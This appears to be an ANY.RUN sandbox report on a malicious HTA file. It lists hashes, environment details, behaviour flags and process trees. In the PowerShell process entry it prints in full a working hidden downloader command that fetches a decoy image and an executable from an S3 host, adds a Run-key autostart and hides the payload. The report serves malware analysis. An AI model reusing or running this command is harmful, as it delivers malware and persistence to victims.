General Info

File name

MSHTAPayloadawalobina.hta

Full analysis
https://app.any.run/tasks/3ded9aa6-72fb-42bb-9dcb-6313dc3359fa
Verdict
Malicious activity
Analysis date
1/10/2019, 20:41:59
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

autoit

Indicators:

MIME:
text/html
File info:
HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5

966ab78b142d9aaed55e86e26ad73887

SHA1

4453f3838ce737f8e7b62545a1a970f21c4a397e

SHA256

3486a83f7060f11655b744238de048e7d9f6e9f41e73fc0635cef356db12be31

SSDEEP

96:wBvaY1zUMd6VfRjF/Vaqk8k236yOXOuJWksRRzMo:wb1zUrbfaIk+pU6xRRzP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • lwh.exe (PID: 3768)
  • WfFyPbj.exe (PID: 2632)
  • lwh.exe (PID: 2736)
Changes the autorun value in the registry
  • powershell.exe (PID: 3716)
  • lwh.exe (PID: 2736)
Uses ATTRIB.EXE to modify file attributes
  • powershell.exe (PID: 3716)
Executes PowerShell scripts
  • iexplore.exe (PID: 3440)
Creates files in the user directory
  • powershell.exe (PID: 3716)
Drop AutoIt3 executable file
  • WfFyPbj.exe (PID: 2632)
Application launched itself
  • lwh.exe (PID: 3768)
Executable content was dropped or overwritten
  • WfFyPbj.exe (PID: 2632)
  • powershell.exe (PID: 3716)
Connects to unusual port
  • RegSvcs.exe (PID: 1144)
Changes internet zones settings
  • iexplore.exe (PID: 3000)
Reads Internet Cache Settings
  • iexplore.exe (PID: 3440)
Reads internet explorer settings
  • iexplore.exe (PID: 3440)
Dropped object may contain Bitcoin addresses
  • lwh.exe (PID: 3768)
  • WfFyPbj.exe (PID: 2632)
Application launched itself
  • iexplore.exe (PID: 3000)
Creates files in the user directory
  • iexplore.exe (PID: 3000)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.html
|   HyperText Markup Language (100%)
EXIF
HTML
ContentType:
text/html; charset=utf-8

Screenshots

Processes

Total processes
41
Monitored processes
9
Malicious processes
5
Suspicious processes
1

Behavior graph

+
start drop and start drop and start iexplore.exe iexplore.exe no specs powershell.exe PhotoViewer.dll no specs wffypbj.exe attrib.exe no specs lwh.exe no specs lwh.exe regsvcs.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3000
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.html
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\cryptbase.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ieui.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\url.dll
c:\windows\system32\version.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msfeeds.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\naturallanguage6.dll
c:\windows\system32\nlsdata0009.dll
c:\windows\system32\nlslexicons0009.dll
c:\windows\system32\tquery.dll
c:\windows\system32\structuredquery.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll

PID
3440
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\mlang.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\apphelp.dll
c:\program files\java\jre1.8.0_92\bin\ssv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\progra~1\micros~1\office14\urlredir.dll
c:\windows\system32\secur32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\progra~1\micros~1\office14\msohev.dll
c:\program files\java\jre1.8.0_92\bin\jp2ssv.dll
c:\program files\java\jre1.8.0_92\bin\msvcr100.dll
c:\program files\java\jre1.8.0_92\bin\deploy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winmm.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\audioses.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\wintrust.dll

PID
3716
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;""
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\program files\windows photo viewer\photoviewer.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\d3d9.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\program files\windows photo viewer\photobase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\roaming\wffypbj.exe
c:\windows\system32\attrib.exe
c:\windows\system32\netutils.dll

PID
2984
CMD
C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
Path
C:\Windows\system32\DllHost.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
COM Surrogate
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\dllhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\windows photo viewer\photoviewer.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\version.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\d3d9.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\slc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\windows photo viewer\photobase.dll
c:\windows\system32\propsys.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\actxprxy.dll
c:\program files\windows photo viewer\imagingengine.dll
c:\windows\system32\mscms.dll
c:\windows\system32\userenv.dll
c:\windows\system32\icm32.dll
c:\windows\system32\thumbcache.dll
c:\windows\system32\psapi.dll

PID
2632
CMD
"C:\Users\admin\AppData\Roaming\WfFyPbj.exe"
Path
C:\Users\admin\AppData\Roaming\WfFyPbj.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\roaming\wffypbj.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\local\temp\88465914\lwh.exe
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\devrtl.dll

PID
3132
CMD
"C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exe
Path
C:\Windows\system32\attrib.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Attribute Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\attrib.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3768
CMD
"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl
Path
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
Indicators
No indicators
Parent process
WfFyPbj.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88465914\lwh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
